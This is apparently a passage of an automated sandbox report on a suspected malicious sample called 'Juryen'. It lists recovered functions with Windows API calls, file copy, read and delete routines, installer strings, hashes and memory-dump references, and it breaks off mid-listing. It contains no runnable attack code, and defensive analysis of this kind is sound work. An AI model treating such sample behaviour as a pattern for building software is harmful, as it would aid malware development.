                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                    • String ID: %ls=%ls$[Rename]
                                                                    • API String ID: 2171350718-461813615
                                                                    • Opcode ID: 3cd7194a84b85a053e31ee19696a447fece43685b985ba60a20dd83e8f5070ac
                                                                    • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                                                    • Opcode Fuzzy Hash: 3cd7194a84b85a053e31ee19696a447fece43685b985ba60a20dd83e8f5070ac
                                                                    • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                                                    Function 1F757CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 1F757D06
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F7590D7
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F7590E9
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F7590FB
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F75910D
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F75911F
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F759131
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F759143
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F759155
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F759167
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F759179
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F75918B
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F75919D
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F7591AF
                                                                    • _free.LIBCMT ref: 1F757CFB
                                                                      • Part of subcall function 1F75571E: HeapFree.KERNEL32(00000000,00000000,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?), ref: 1F755734
                                                                      • Part of subcall function 1F75571E: GetLastError.KERNEL32(?,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?,?), ref: 1F755746
                                                                    • _free.LIBCMT ref: 1F757D1D
                                                                    • _free.LIBCMT ref: 1F757D32
                                                                    • _free.LIBCMT ref: 1F757D3D
                                                                    • _free.LIBCMT ref: 1F757D5F
                                                                    • _free.LIBCMT ref: 1F757D72
                                                                    • _free.LIBCMT ref: 1F757D80
                                                                    • _free.LIBCMT ref: 1F757D8B
                                                                    • _free.LIBCMT ref: 1F757DC3
                                                                    • _free.LIBCMT ref: 1F757DCA
                                                                    • _free.LIBCMT ref: 1F757DE7
                                                                    • _free.LIBCMT ref: 1F757DFF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 98837085d018d74e861ff20b0537a1f44af1f35d363f8a6426e9cf8b01730c5a
                                                                    • Instruction ID: e43ecd8506d18ed29b8c18c3b0cfa184302b17a0dc95410a94970c102a0fe9c1
                                                                    • Opcode Fuzzy Hash: 98837085d018d74e861ff20b0537a1f44af1f35d363f8a6426e9cf8b01730c5a
                                                                    • Instruction Fuzzy Hash: 8C317335500349DFEB119A38E944BA6F7EAEF44214F114969E849DB270EF75F881C750
                                                                    Function 004049B1 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                                                    • lstrcmpiW.KERNEL32(004279C0,00422F08,00000000,?,?), ref: 00404B18
                                                                    • lstrcatW.KERNEL32(?,004279C0), ref: 00404B24
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                                                      • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
                                                                      • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,00434000,771B3420,00436800,00000000,004034F7,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                      • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                      • Part of subcall function 004067EF: CharNextW.USER32(?,00434000,771B3420,00436800,00000000,004034F7,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                      • Part of subcall function 004067EF: CharPrevW.USER32(?,?,771B3420,00436800,00000000,004034F7,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                    • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                                                      • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                      • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                                                      • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: A
                                                                    • API String ID: 2624150263-3554254475
                                                                    • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                    • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                                                    • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                    • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
                                                                    Function 004030A2 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 181memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004030B3
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
                                                                      • Part of subcall function 00406031: GetFileAttributesW.KERNEL32(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                      • Part of subcall function 00406031: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 0040311B
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00403251
                                                                    Strings
                                                                    • Null, xrefs: 00403199
                                                                    • Inst, xrefs: 00403187
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                                    • Error launching installer, xrefs: 004030F2
                                                                    • soft, xrefs: 00403190
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 2803837635-527102705
                                                                    • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                    • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                                                    • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                    • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D
                                                                    Function 1F7559D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 1F7559EA
                                                                      • Part of subcall function 1F75571E: HeapFree.KERNEL32(00000000,00000000,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?), ref: 1F755734
                                                                      • Part of subcall function 1F75571E: GetLastError.KERNEL32(?,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?,?), ref: 1F755746
                                                                    • _free.LIBCMT ref: 1F7559F6
                                                                    • _free.LIBCMT ref: 1F755A01
                                                                    • _free.LIBCMT ref: 1F755A0C
                                                                    • _free.LIBCMT ref: 1F755A17
                                                                    • _free.LIBCMT ref: 1F755A22
                                                                    • _free.LIBCMT ref: 1F755A2D
                                                                    • _free.LIBCMT ref: 1F755A38
                                                                    • _free.LIBCMT ref: 1F755A43
                                                                    • _free.LIBCMT ref: 1F755A51
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 8657fb9fa9cc414369c1d8d8d57fa6bfba331ffce369fbccbfa373246390759f
                                                                    • Instruction ID: edc1748e4f2579988b13ca946604397af650c15f27d7ee2fd18be874f3592305
                                                                    • Opcode Fuzzy Hash: 8657fb9fa9cc414369c1d8d8d57fa6bfba331ffce369fbccbfa373246390759f
                                                                    • Instruction Fuzzy Hash: 70117F7E520248EFCB11DF94E845CDD3FA9EF88254B5585A5BA088F235DA32EA509B80
                                                                    Function 0040657E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(004279C0,00000400), ref: 004066A0
                                                                    • GetWindowsDirectoryW.KERNEL32(004279C0,00000400,00000000,00421EE8,?,?,00000000,00000000,?,00000000), ref: 004066B6
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,004279C0), ref: 00406714
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                                                    • lstrcatW.KERNEL32(004279C0,\Microsoft\Internet Explorer\Quick Launch,00000000,00421EE8,?,?,00000000,00000000,?,00000000), ref: 00406748
                                                                    • lstrlenW.KERNEL32(004279C0,00000000,00421EE8,?,?,00000000,00000000,?,00000000), ref: 004067A2
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406671
                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406742
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 4024019347-730719616
                                                                    • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                    • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                                                    • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                    • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E
                                                                    Function 1F751CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D1B
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1F751D37
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D4B
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D58
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D72
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D7D
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D8A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 1454806937-0
                                                                    • Opcode ID: 5983c268f4e20f390337ba49adaa450e14e124897dceeb8cb1ea03a67a2dddfb
                                                                    • Instruction ID: 7e2b16cf90c2ea0814ca3ea53da2c20e30fa9f3ec8285d869df3291c121d6cfc
                                                                    • Opcode Fuzzy Hash: 5983c268f4e20f390337ba49adaa450e14e124897dceeb8cb1ea03a67a2dddfb
                                                                    • Instruction Fuzzy Hash: 392130B194122CBFD710DBA0DCCCEEB76ACEB4C365F0005A6F515D2150E6B19E9A8BB0
                                                                    Function 00404527 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                                                    • GetSysColor.USER32(00000000), ref: 00404582
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                                                    • SetBkMode.GDI32(?,?), ref: 0040459A
                                                                    • GetSysColor.USER32(?), ref: 004045AD
                                                                    • SetBkColor.GDI32(?,?), ref: 004045BD
                                                                    • DeleteObject.GDI32(?), ref: 004045D7
                                                                    • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                    • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                    • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                                                    Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                      • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                    • String ID: 9
                                                                    • API String ID: 163830602-2366072709
                                                                    • Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                    • Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
                                                                    • Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                    • Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
                                                                    Function 1F759492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,1F759C07,?,00000000,?,00000000,00000000), ref: 1F7594D4
                                                                    • __fassign.LIBCMT ref: 1F75954F
                                                                    • __fassign.LIBCMT ref: 1F75956A
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 1F759590
                                                                    • WriteFile.KERNEL32(?,?,00000000,1F759C07,00000000,?,?,?,?,?,?,?,?,?,1F759C07,?), ref: 1F7595AF
                                                                    • WriteFile.KERNEL32(?,?,00000001,1F759C07,00000000,?,?,?,?,?,?,?,?,?,1F759C07,?), ref: 1F7595E8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: 006ae9f9fdb13093186cc883420f2903674170b5e0064e8e219f8fefaa8c5d4a
                                                                    • Instruction ID: 927097a11f8daf550de0b098cbc06b11238ca51d4abd6073383d6eac63f7b83d
                                                                    • Opcode Fuzzy Hash: 006ae9f9fdb13093186cc883420f2903674170b5e0064e8e219f8fefaa8c5d4a
                                                                    • Instruction Fuzzy Hash: D7510770D00249AFDB00CFA4D895AEEFBF9FF49310F10411AE956E72A1E730A955CBA0
                                                                    Function 1F753370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 1F75339B
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 1F7533A3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 1F753431
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 1F75345C
                                                                    • _ValidateLocalCookies.LIBCMT ref: 1F7534B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: f1dbf8c53b8a8fcaa99ce3ae70e8b979918c9c544825ad81109a13bb5729e7f5
                                                                    • Instruction ID: f82a33e119e3f9d5ff3dd9c75973256d57c27cf1a51fa147290f440f940cf911
                                                                    • Opcode Fuzzy Hash: f1dbf8c53b8a8fcaa99ce3ae70e8b979918c9c544825ad81109a13bb5729e7f5
                                                                    • Instruction Fuzzy Hash: 1E41C634E00219ABCF41CF68D884AAEBBB7AF49324F108159E8159B371D735EA15CB91
                                                                    Function 004055C6 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00421EE8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                    • lstrlenW.KERNEL32(00403412,00421EE8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                    • lstrcatW.KERNEL32(00421EE8,00403412,00403412,00421EE8,00000000,?,00000000), ref: 00405621
                                                                    • SetWindowTextW.USER32(00421EE8,00421EE8), ref: 00405633
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2531174081-0
                                                                    • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                    • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                                                    • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                    • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58
                                                                    Function 1F75925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 1F759221: _free.LIBCMT ref: 1F75924A
                                                                    • _free.LIBCMT ref: 1F7592AB
                                                                      • Part of subcall function 1F75571E: HeapFree.KERNEL32(00000000,00000000,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?), ref: 1F755734
                                                                      • Part of subcall function 1F75571E: GetLastError.KERNEL32(?,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?,?), ref: 1F755746
                                                                    • _free.LIBCMT ref: 1F7592B6
                                                                    • _free.LIBCMT ref: 1F7592C1
                                                                    • _free.LIBCMT ref: 1F759315
                                                                    • _free.LIBCMT ref: 1F759320
                                                                    • _free.LIBCMT ref: 1F75932B
                                                                    • _free.LIBCMT ref: 1F759336
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                    • Instruction ID: 63e0ce8f325b4280a51469bf51f3eea96c4a157569e0df0069cb8b933fe7ebdb
                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                    • Instruction Fuzzy Hash: 59119335540B08FAEA20ABF1ED4DFCF7BAD9F45704F400C24A69AB6072DA36B5048791
                                                                    Function 00404E7B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                                                    • GetMessagePos.USER32 ref: 00404E9E
                                                                    • ScreenToClient.USER32(?,?), ref: 00404EB8
